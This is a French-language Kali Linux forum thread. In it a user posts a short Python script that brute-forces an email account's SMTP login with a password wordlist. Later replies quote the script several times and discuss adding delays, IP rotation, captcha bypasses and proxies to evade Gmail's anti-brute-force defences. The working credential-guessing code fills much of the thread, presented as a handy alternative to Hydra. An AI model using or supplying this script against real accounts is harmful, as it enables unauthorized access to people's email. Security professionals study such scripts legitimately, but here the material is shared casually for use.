Le Forum francophone communautaire des utilisateurs de Kali linux

Développement => Vos créations => Discussion démarrée par: _john_doe le 01 octobre 2019 à 23:35:08

Titre: Ya pas qu'Hydra dans la vie
Posté par: _john_doe le 01 octobre 2019 à 23:35:08
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: Snk le 02 octobre 2019 à 07:52:02
C'est cool python quand même...  ;)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 07:52:57
Quel petit malin ce john :3
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: coyotus le 02 octobre 2019 à 09:38:32
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass
Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 09:52:19
Je prefères autant que tu ne postes pas ça en  effet ;)
Titre: Re : Re : Ya pas qu'Hydra dans la vie
Posté par: _john_doe le 02 octobre 2019 à 09:56:12

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 09:59:25
+1 john :)
Titre: Re : Re : Re : Ya pas qu'Hydra dans la vie
Posté par: Shakim le 02 octobre 2019 à 11:01:43

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)

 Merci beaucoup pour le partage.
Au vue de la montagne de science évoquée ici, peut t-on rapidement et théoriquement expliquer (sans ligne de code) comment un bypass de captcha et un "un tips qui change l'ip sender " fonctionnent ?  :o
A ma connaissance, le seul bypass de captcha viable que je connaisse c'est les application qui soutraite des petites mains pour valider des captcha en série.
Coté changement d'ip sender... Si vous changez l'ip du sender dans la trame, le paquet n'est pas sensé revenir puisqu'il est utilisé pour la réponse, si ?
Titre: Re : Re : Ya pas qu'Hydra dans la vie
Posté par: WarLocG le 02 octobre 2019 à 11:17:00
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass
Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Je pense au contraire que tout y est dans la "version d'origine" ^^
Regarde la première ligne avec le import, on ne voit pas le #!/bin/python ni le coding et il est tout à fait déductible qu'il y a encore d'autres import

La boucle pour tester le dico y est, c'est le "for entrees in pass_file:" :)

Si tu regardes la fin avec le "pass", tu peux également déduire qu'il y a bien assez de place pour y mettre le sleep et quelques tests conditionnels et autres itérations supplémentaires en sortie du try/except :)

Citer
Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)
Tout est dit :)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: coyotus le 02 octobre 2019 à 11:26:33
ça permet d'en savoir plus sur le code sans tout dévoiler :D
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 11:37:51
surtout que le script donne déjà beaucoup d'informations si l'on prend la peine de chercher :)
Titre: Re : Re : Re : Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 11:39:28

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)

 Merci beaucoup pour le partage.
Au vue de la montagne de science évoquée ici, peut t-on rapidement et théoriquement expliquer (sans ligne de code) comment un bypass de captcha et un "un tips qui change l'ip sender " fonctionnent ?  :o
A ma connaissance, le seul bypass de captcha viable que je connaisse c'est les application qui soutraite des petites mains pour valider des captcha en série.
Coté changement d'ip sender... Si vous changez l'ip du sender dans la trame, le paquet n'est pas sensé revenir puisqu'il est utilisé pour la réponse, si ?

Une recherche te donnera toutes les réponses ;)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: Koma le 02 octobre 2019 à 18:47:56
Oui ok c'est bien mais du coup, comment je hack facebook ?  ::) ::)
Titre: Re : Ya pas qu'Hydra dans la vie
Posté par: ZeR0-@bSoLu le 02 octobre 2019 à 18:57:13
tu peux télécharger mon soft ici qui va te le faire automatiquement :

www.howtofuckyourpc.com